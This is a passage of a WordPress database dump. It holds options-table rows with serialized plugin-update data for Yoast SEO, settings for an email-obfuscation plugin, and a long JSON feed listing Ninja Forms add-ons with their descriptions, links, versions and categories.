s://downloads.wordpress.org/plugin/wordpress-seo.17.2.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:66:\"https://ps.w.org/wordpress-seo/assets/icon-256x256.png?rev=2363699\";s:2:\"1x\";s:58:\"https://ps.w.org/wordpress-seo/assets/icon.svg?rev=2363699\";s:3:\"svg\";s:58:\"https://ps.w.org/wordpress-seo/assets/icon.svg?rev=2363699\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:69:\"https://ps.w.org/wordpress-seo/assets/banner-1544x500.png?rev=1843435\";s:2:\"1x\";s:68:\"https://ps.w.org/wordpress-seo/assets/banner-772x250.png?rev=1843435\";}s:11:\"banners_rtl\";a:2:{s:2:\"2x\";s:73:\"https://ps.w.org/wordpress-seo/assets/banner-1544x500-rtl.png?rev=1843435\";s:2:\"1x\";s:72:\"https://ps.w.org/wordpress-seo/assets/banner-772x250-rtl.png?rev=1843435\";}s:8:\"requires\";s:3:\"5.6\";}}}','no'),(439324,'bkup_c2c_obfuscate_email','a:6:{s:17:\"encode_everything\";s:1:\"1\";s:10:\"at_replace\";s:0:\"\";s:11:\"dot_replace\";s:0:\"\";s:18:\"use_text_direction\";s:0:\"\";s:16:\"use_display_none\";s:1:\"1\";s:8:\"_version\";s:3:\"3.7\";}','yes'),(439319,'ninja_forms_addons_feed','[{\"title\":\"Conditional Logic\",\"image\":\"assets\\/img\\/add-ons\\/conditional-logic.png\",\"content\":\"Build dynamic forms that can change as a user fills out the form. Show and hide fields. Send certain email, don\'t send others. Redirect to one of many pages. The possibilities are endless!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/conditional-logic\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Conditional+Logic\",\"plugin\":\"ninja-forms-conditionals\\/conditionals.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/conditional-logic\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Conditional+Logic+Docs\",\"version\":\"3.1\",\"categories\":[{\"name\":\"Look &amp; Feel\",\"slug\":\"look-feel\"},{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Developer\",\"slug\":\"developer\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"User\",\"slug\":\"user\"},{\"name\":\"Business\",\"slug\":\"business\"},{\"name\":\"Personal\",\"slug\":\"personal\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Form Function and Design\",\"slug\":\"form-function-design\"}]},{\"title\":\"Multi Step Forms\",\"image\":\"assets\\/img\\/add-ons\\/multi-step-forms.png\",\"content\":\"Give submissions a boost on any longer form by making it a multi-page form. Drag and drop fields between pages, add breadcrumb navigation, a progress bar, and loads more!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/multi-step-forms\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Multi+Step+Forms\",\"plugin\":\"ninja-forms-multi-part\\/multi-part.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/multi-step-forms\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Multi+Step+Forms+Docs\",\"version\":\"3.0.26\",\"categories\":[{\"name\":\"Look &amp; Feel\",\"slug\":\"look-feel\"},{\"name\":\"Developer\",\"slug\":\"developer\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"User\",\"slug\":\"user\"},{\"name\":\"Business\",\"slug\":\"business\"},{\"name\":\"Personal\",\"slug\":\"personal\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Form Function and Design\",\"slug\":\"form-function-design\"}]},{\"title\":\"Front-End Posting\",\"image\":\"assets\\/img\\/add-ons\\/front-end-posting.png\",\"content\":\"Let users publish content just by submitting a form! Completely configurable including post type, title, even categories and tags. Set post status, author, and much more!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/post-creation\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Front-End+Posting\",\"plugin\":\"ninja-forms-post-creation\\/ninja-forms-post-creation.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/post-creation\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Front-End+Posting+Docs\",\"version\":\"3.0.10\",\"categories\":[{\"name\":\"Content Management\",\"slug\":\"content-management\"},{\"name\":\"Developer\",\"slug\":\"developer\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"User\",\"slug\":\"user\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"User Management\",\"slug\":\"user-management\"}]},{\"title\":\"File Uploads\",\"image\":\"assets\\/img\\/add-ons\\/file-uploads.png\",\"content\":\"Upload files to WordPress, Google Drive, Dropbox, or Amazon S3. Upload documents, images, media, and more. Easily control file type and size. Add an upload field to any form!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/file-uploads\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=File+Uploads\",\"plugin\":\"ninja-forms-uploads\\/file-uploads.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/file-uploads\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=File+Uploads+Docs\",\"version\":\"3.3.12\",\"categories\":[{\"name\":\"Content Management\",\"slug\":\"content-management\"},{\"name\":\"Developer\",\"slug\":\"developer\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"User\",\"slug\":\"user\"},{\"name\":\"Business\",\"slug\":\"business\"},{\"name\":\"Personal\",\"slug\":\"personal\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"File Management\",\"slug\":\"file-management\"}]},{\"title\":\"Layout and Styles\",\"image\":\"assets\\/img\\/add-ons\\/layout-styles.png\",\"content\":\"Drag and drop fields into columns and rows. Resize fields. Add backgrounds, adjust borders, and more. Design gorgeous forms without being a designer!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/layouts-and-styles\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Layout+and+Styles\",\"plugin\":\"ninja-forms-style\\/ninja-forms-style.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/layouts-and-styles\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Layout+and+Styles+Docs\",\"version\":\"3.0.29\",\"categories\":[{\"name\":\"Look &amp; Feel\",\"slug\":\"look-feel\"},{\"name\":\"Developer\",\"slug\":\"developer\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"User\",\"slug\":\"user\"},{\"name\":\"Business\",\"slug\":\"business\"},{\"name\":\"Personal\",\"slug\":\"personal\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Form Function and Design\",\"slug\":\"form-function-design\"}]},{\"title\":\"Mailchimp\",\"image\":\"assets\\/img\\/add-ons\\/mailchimp.png\",\"content\":\"Bring new life to your lists with upgraded Mailchimp signup forms for WordPress! Easy to build and customize with no code required. Link to lists and interest groups!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/mailchimp\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Mailchimp\",\"plugin\":\"ninja-forms-mail-chimp\\/ninja-forms-mail-chimp.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/mailchimp\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Mailchimp+Docs\",\"version\":\"3.2.2\",\"categories\":[{\"name\":\"Email Marketing\",\"slug\":\"email-marketing\"},{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Business\",\"slug\":\"business\"},{\"name\":\"Personal\",\"slug\":\"personal\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"}]},{\"title\":\"Campaign Monitor\",\"image\":\"assets\\/img\\/add-ons\\/campaign-monitor.png\",\"content\":\"Make any form a custom crafted WordPress signup form for Campaign Monitor. Connect to any list, link form fields to list fields, and watch your lists grow!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/campaign-monitor\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Campaign+Monitor\",\"plugin\":\"ninja-forms-campaign-monitor\\/ninja-forms-campaign-monitor.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/campaign-monitor\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Campaign+Monitor+Docs\",\"version\":\"3.0.5\",\"categories\":[{\"name\":\"Email Marketing\",\"slug\":\"email-marketing\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Personal\",\"slug\":\"personal\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"}]},{\"title\":\"User Analytics\",\"image\":\"assets\\/img\\/add-ons\\/user-analytics.png\",\"content\":\"Get better data on where your form traffic is coming from with every submission. Add 12+ analytics fields including UTM values,  URL referrer, geo data, and more!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/user-analytics\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=User+Analytics\",\"plugin\":\"ninja-forms-user-analytics\\/ninja-forms-user-analytics.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/user-analytics\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=User+Analytics+Docs\",\"version\":\"3.0.1\",\"categories\":[{\"name\":\"Content Management\",\"slug\":\"content-management\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"User Management\",\"slug\":\"user-management\"}]},{\"title\":\"Constant Contact\",\"image\":\"assets\\/img\\/add-ons\\/constant-contact.png\",\"content\":\"Connect WordPress to Constant Contact with forms that you can build and design just the way you want, no tech skills required! Subscribe users to any list or interest group.\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/constant-contact\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Constant+Contact\",\"plugin\":\"ninja-forms-constant-contact\\/ninja-forms-constant-contact.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/constant-contact\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Constant+Contact+Docs\",\"version\":\"3.1.0\",\"categories\":[{\"name\":\"Email Marketing\",\"slug\":\"email-marketing\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Personal\",\"slug\":\"personal\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"}]},{\"title\":\"AWeber\",\"image\":\"assets\\/img\\/add-ons\\/aweber.png\",\"content\":\"Build your lists faster with easy to design, professional quality WordPress signup forms. No technical skills required. Connect WordPress to AWeber with style!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/aweber\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=AWeber\",\"plugin\":\"ninja-forms-aweber\\/ninja-forms-aweber.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/aweber\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=AWeber+Docs\",\"version\":\"3.1.1\",\"categories\":[{\"name\":\"Email Marketing\",\"slug\":\"email-marketing\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Agency\",\"slug\":\"agency\"}]},{\"title\":\"PayPal Express\",\"image\":\"assets\\/img\\/add-ons\\/paypal-express.png\",\"content\":\"Set up any form to accept PayPal payments with PayPal Express for WordPress! Base totals on a fixed amount, user entered amount, or a calculated total.\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/paypal-express\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=PayPal+Express\",\"plugin\":\"ninja-forms-paypal-express\\/ninja-forms-paypal-express.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/paypal-express\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=PayPal+Express+Docs\",\"version\":\"3.0.15\",\"categories\":[{\"name\":\"Payment Gateways\",\"slug\":\"payment-gateways\"},{\"name\":\"Developer\",\"slug\":\"developer\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"User\",\"slug\":\"user\"},{\"name\":\"Business\",\"slug\":\"business\"},{\"name\":\"Personal\",\"slug\":\"personal\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"}]},{\"title\":\"MailPoet\",\"image\":\"assets\\/img\\/add-ons\\/mailpoet.png\",\"content\":\"Say hello better! Customize your MailPoet signup forms to draw more subscribers than ever before. Connect WordPress to any MailPoet list in minutes!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/mailpoet\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=MailPoet\",\"plugin\":\"ninja-forms-mailpoet\\/nf-mailpoet.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/mailpoet\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=MailPoet+Docs\",\"version\":\"3.0.0\",\"categories\":[{\"name\":\"Email Marketing\",\"slug\":\"email-marketing\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Agency\",\"slug\":\"agency\"}]},{\"title\":\"Zoho CRM\",\"image\":\"assets\\/img\\/add-ons\\/zoho-crm.png\",\"content\":\"Customize your forms to get the most out of your connection between WordPress and Zoho. Link form fields directly to Zoho fields, custom fields included, from almost any module.\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/zoho-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Zoho+CRM\",\"plugin\":\"ninja-forms-zoho-crm\\/ninja-forms-zoho-crm.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/zoho-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Zoho+CRM+Docs\",\"version\":\"3.4\",\"categories\":[{\"name\":\"CRM Integrations\",\"slug\":\"crm-integrations\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Agency\",\"slug\":\"agency\"}]},{\"title\":\"Capsule CRM\",\"image\":\"assets\\/img\\/add-ons\\/capsule-crm.png\",\"content\":\"Boost conversions from WordPress to Capsule with forms tailor made to your audience. Link form fields to Capsule fields from a wide range of modules. Custom fields too!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/capsule-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Capsule+CRM\",\"plugin\":\"ninja-forms-capsule-crm\\/ninja-forms-capsule-crm.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/capsule-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Capsule+CRM+Docs\",\"version\":\"3.4.1\",\"categories\":[{\"name\":\"CRM Integrations\",\"slug\":\"crm-integrations\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Agency\",\"slug\":\"agency\"}]},{\"title\":\"Stripe\",\"image\":\"assets\\/img\\/add-ons\\/stripe.png\",\"content\":\"Set up any WordPress form to accept credit card payments or donations through Stripe. Base totals on a fixed amount, user entered amount, or a calculated total!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/stripe\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Stripe\",\"plugin\":\"ninja-forms-stripe\\/ninja-forms-stripe.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/stripe\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Stripe+Docs\",\"version\":\"3.1.3\",\"categories\":[{\"name\":\"Payment Gateways\",\"slug\":\"payment-gateways\"},{\"name\":\"Developer\",\"slug\":\"developer\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"User\",\"slug\":\"user\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"}]},{\"title\":\"Insightly CRM\",\"image\":\"assets\\/img\\/add-ons\\/insightly-crm.png\",\"content\":\"Your customer\'s journey begins with your WordPress forms. Send Contacts, Leads, Opportunities, Custom fields and more seamlessly from WordPress to Insightly!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/insightly-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Insightly+CRM\",\"plugin\":\"ninja-forms-insightly-crm\\/ninja-forms-insightly-crm.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/insightly-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Insightly+CRM+Docs\",\"version\":\"3.2.0\",\"categories\":[{\"name\":\"CRM Integrations\",\"slug\":\"crm-integrations\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Agency\",\"slug\":\"agency\"}]},{\"title\":\"PDF Form Submission\",\"image\":\"assets\\/img\\/add-ons\\/pdf-form-submission.png\",\"content\":\"Generate a PDF of any WordPress form submission. Export any submission as a PDF, or attach it to an email and send a copy to whoever needs one!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/pdf\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=PDF+Form+Submission\",\"plugin\":\"ninja-forms-pdf-submissions\\/nf-pdf-submissions.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/pdf\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=PDF+Form+Submission+Docs\",\"version\":\"3.1.4\",\"categories\":[{\"name\":\"Content Management\",\"slug\":\"content-management\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Business\",\"slug\":\"business\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"File Management\",\"slug\":\"file-management\"}]},{\"title\":\"Trello\",\"image\":\"assets\\/img\\/add-ons\\/trello.png\",\"content\":\"Create a new Trello card with data from any WordPress form submission. Map fields to card details, assign members and labels, upload images, embed links.\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/trello\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Trello\",\"plugin\":\"ninja-forms-trello\\/ninja-forms-trello.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/trello\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Trello+Docs\",\"version\":\"3.0.3\",\"categories\":[{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Notification and Workflow\",\"slug\":\"notification-workflow\"}]},{\"title\":\"Elavon\",\"image\":\"assets\\/img\\/add-ons\\/elavon.png\",\"content\":\"Accept credit card payments from any of your WordPress forms. Pass customer and invoice info from any field securely into Elavon with each payment.\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/elavon\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Elavon\",\"plugin\":\"ninja-forms-elavon-payment-gateway\\/ninja-forms-elavon-payment-gateway.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/elavon\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Elavon+Docs\",\"version\":\"3.1.0\",\"categories\":[{\"name\":\"Payment Gateways\",\"slug\":\"payment-gateways\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Agency\",\"slug\":\"agency\"}]},{\"title\":\"Zapier\",\"image\":\"assets\\/img\\/add-ons\\/zapier.png\",\"content\":\"Don\'t see an add-on integration for a service you love? Don\'t worry! Connect WordPress to more than 1,500 different services through Zapier, no code required!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/zapier\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Zapier\",\"plugin\":\"ninja-forms-zapier\\/ninja-forms-zapier.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/zapier\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Zapier+Docs\",\"version\":\"3.0.8\",\"categories\":[{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"File Management\",\"slug\":\"file-management\"},{\"name\":\"Notification and Workflow\",\"slug\":\"notification-workflow\"},{\"name\":\"Custom Integrations\",\"slug\":\"custom-integrations\"}]},{\"title\":\"Salesforce CRM\",\"image\":\"assets\\/img\\/add-ons\\/salesforce-crm.png\",\"content\":\"Easily map any form field to any Salesforce Object or Field. A better connection to your customers begins with a better WordPress form builder!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/salesforce-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Salesforce+CRM\",\"plugin\":\"ninja-forms-salesforce-crm\\/ninja-forms-salesforce-crm.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/salesforce-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Salesforce+CRM+Docs\",\"version\":\"3.3.0\",\"categories\":[{\"name\":\"CRM Integrations\",\"slug\":\"crm-integrations\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Agency\",\"slug\":\"agency\"}]},{\"title\":\"Slack\",\"image\":\"assets\\/img\\/add-ons\\/slack.png\",\"content\":\"Get realtime Slack notifications in the workspace and channel of your choice with any new WordPress form submission. @Mention any team member!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/slack\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Slack\",\"plugin\":\"ninja-forms-slack\\/ninja-forms-slack.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/slack\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Slack+Docs\",\"version\":\"3.0.3\",\"categories\":[{\"name\":\"Notifications\",\"slug\":\"notifications\"},{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Notification and Workflow\",\"slug\":\"notification-workflow\"}]},{\"title\":\"CleverReach\",\"image\":\"assets\\/img\\/add-ons\\/cleverreach.png\",\"content\":\"Grow the reach of your email marketing with better CleverReach signup forms. Tailor your forms to your audience with this easy to set up integration!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/cleverreach\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=CleverReach\",\"plugin\":\"ninja-forms-cleverreach\\/ninja-forms-cleverreach.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/cleverreach\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=CleverReach+Docs\",\"version\":\"3.1.5\",\"categories\":[{\"name\":\"Email Marketing\",\"slug\":\"email-marketing\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Agency\",\"slug\":\"agency\"}]},{\"title\":\"Webhooks\",\"image\":\"assets\\/img\\/add-ons\\/webhooks.png\",\"content\":\"Can\'t find a WordPress integration for the service you love? Send WordPress forms data to any external URL using a simple GET or POST request!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/webhooks\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Webhooks\",\"plugin\":\"ninja-forms-webhooks\\/ninja-forms-webhooks.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/webhooks\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Webhooks+Docs\",\"version\":\"3.0.5\",\"categories\":[{\"name\":\"Notifications\",\"slug\":\"notifications\"},{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Developer\",\"slug\":\"developer\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"User\",\"slug\":\"user\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Custom Integrations\",\"slug\":\"custom-integrations\"}]},{\"title\":\"Excel Export\",\"image\":\"assets\\/img\\/add-ons\\/excel-export.png\",\"content\":\"Export any form\'s submissions as a Microsoft Excel spreadsheet. Choose a date range, the fields you want to include, and export to Excel! \",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/excel-export\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Excel+Export\",\"plugin\":\"ninja-forms-excel-export\\/ninja-forms-excel-export.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/excel-export\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Excel+Export+Docs\",\"version\":\"3.3.2\",\"categories\":[{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"File Management\",\"slug\":\"file-management\"}]},{\"title\":\"Formstack Documents\",\"image\":\"assets\\/img\\/add-ons\\/webmerge.png\",\"content\":\"Create specifically formatted templates from an uploaded PDF or Word document, then auto-fill them from any WordPress form submission!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/webmerge\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Formstack+Documents\",\"plugin\":\"ninja-forms-webmerge\\/ninja-forms-webmerge.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/webmerge\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Formstack+Documents+Docs\",\"version\":\"3.0.3\",\"categories\":[{\"name\":\"Content Management\",\"slug\":\"content-management\"},{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Developer\",\"slug\":\"developer\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"User\",\"slug\":\"user\"},{\"name\":\"Agency\",\"slug\":\"agency\"}]},{\"title\":\"Help Scout\",\"image\":\"assets\\/img\\/add-ons\\/help-scout.png\",\"content\":\"Offering great support is hard. Tailor your WordPress forms to match your customers\' needs with this Help Scout integration for WordPress.\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/help-scout\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Help+Scout\",\"plugin\":null,\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/help-scout\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Help+Scout+Docs\",\"version\":\"3.1.3\",\"categories\":[{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"User Management\",\"slug\":\"user-management\"}]},{\"title\":\"Emma\",\"image\":\"assets\\/img\\/add-ons\\/emma.png\",\"content\":\"Take your email marketing further with handcrafted, easy to build signup forms that connect directly into your Emma account! \",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/emma\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Emma\",\"plugin\":\"ninja-forms-emma\\/ninja-forms-emma.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/emma\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Emma+Docs\",\"version\":\"3.0.4\",\"categories\":[{\"name\":\"Email 